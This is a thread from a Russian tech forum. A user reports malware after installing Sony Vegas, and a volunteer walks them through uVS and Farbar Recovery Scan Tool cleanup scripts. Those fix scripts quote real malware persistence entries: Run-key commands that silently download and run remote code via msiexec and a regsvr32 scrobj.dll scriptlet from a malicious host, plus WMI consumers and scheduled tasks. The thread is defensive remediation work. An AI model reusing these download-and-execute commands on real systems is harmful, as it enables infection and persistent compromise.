Технический форум
Страница 1 из 4 1 234
Показывать 40 сообщений этой темы на одной странице

Технический форум (http://www.tehnari.ru/)
-   Безопасность (http://www.tehnari.ru/f35/)
-   -   Вирус (http://www.tehnari.ru/f35/t261417/)

DarkKiber 18.10.2018 11:19
Вирус
 
Вложений: 1
Всем привет!
Вообщем случилась такая проблема - подхватил вирус после установки кое-какой программы

а именно Sony Vegas

После того схватил вирус на компе появился пользователь ASP(на данный момент удалён)
Ну и в целом начал прилично подвисать компьютер вне зависимости от того что я делаю

Нужна помощь

Логи прицепил

Заранее спасибо

DarkKiber 18.10.2018 17:06
И ещё момент

Два файла на которые постоянно ругается антивирус это v.exe и conhost.exe

mike 1 19.10.2018 23:01
  1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    Код:
    ;uVS v4.0.23 [http://dsrt.dyndns.org]
    ;Target OS: NTv6.1
    v400c
    breg

    regt 26
    delref A.EXE
    delref HTTP://JS.FTP0930.HOST:280/HELLOWORLD.MSI
    delref HTTP://JS.FTP0930.HOST:280/V.SCT
    delref S.DAT
    delref S.RAR
    delref KERNCAP.VBS
    delall %SystemRoot%\DEBUG\ITEM.DAT
    delall %SystemRoot%\DEBUG\OK.DAT
    delref PS&C:\WINDOWS\HELP\LSMOSEE.EXE
    delref S&C:\WINDOWS\UPDATE.EXE
    deltmp
    restart
  4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен..

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
  1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
  2. Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files".
  3. Нажмите кнопку Scan.
  4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
  5. Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.

DarkKiber 19.10.2018 23:21
Хорошо, uVS сделал
остался только Farbar

DarkKiber 19.10.2018 23:25
Вложений: 2
Вот логи

Всё сделал)

mike 1 20.10.2018 02:10
Вложений: 1
ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!
  1. Временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Сохраните файл fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool
  3. Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  4. Обратите внимание, что компьютер будет перезагружен.
  5. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

DarkKiber 20.10.2018 02:41
Вложений: 1
Вот лог

Архив загрузил на нужный сайт

mike 1 20.10.2018 17:44
Повторите логи FRST.txt, Addition.txt

DarkKiber 20.10.2018 20:36
Вложений: 2
Вот логи

на данный момент всё вроде бы спокойно =)

mike 1 20.10.2018 23:48
Да не все спокойно судя по логам.

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!
  1. Временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
    Код:
    CreateRestorePoint:
    CloseProcesses:
    HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.ftp0930.host:280/helloworld.msi /q <==== ATTENTION
    HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp0930.host:280/v.sct scrobj.dll <==== ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{6ab6745c-02bf-4cde-884c-f4422374dc5f} <==== ATTENTION (Restriction - IP)
    S2 mssecsvc2.0; C:\WINDOWS\mssecsvc.exe -m security [X]
    2018-10-20 10:55 - 2018-10-20 10:55 - 000003520 _____ C:\Windows\System32\Tasks\Mysa
    2018-10-20 10:55 - 2018-10-20 10:55 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3
    2018-10-20 10:55 - 2018-10-20 10:55 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2
    2018-10-20 10:55 - 2018-10-20 10:55 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
    2018-10-20 10:55 - 2018-10-20 10:55 - 000003186 _____ C:\Windows\System32\Tasks\ok
    2018-10-20 10:55 - 2018-10-20 10:55 - 000000067 _____ C:\Program Files\Common Files\xpdown.dat
    2018-10-20 10:55 - 2018-10-20 10:55 - 000000005 _____ C:\Windows\system32\1.txt
    2018-10-20 01:47 - 2018-10-20 01:47 - 003514368 ____S C:\Windows\tasksche.exe
    2018-10-20 10:55 - 2018-10-20 10:55 - 000000067 _____ () C:\Program Files\Common Files\xpdown.dat
    WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
    zip:C:\FRST\Quarantine
    EmptyTemp:
  3. Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  4. Обратите внимание, что компьютер будет перезагружен.
  5. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

Далее сделайте лог uVS с загрузочного диска https://chklst.ru/discussion/61/winpe-uvs


Часовой пояс GMT +4, время: 17:21.
Страница 1 из 4 1 234
Показывать 40 сообщений этой темы на одной странице

Powered by vBulletin® Version 4.5.3
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.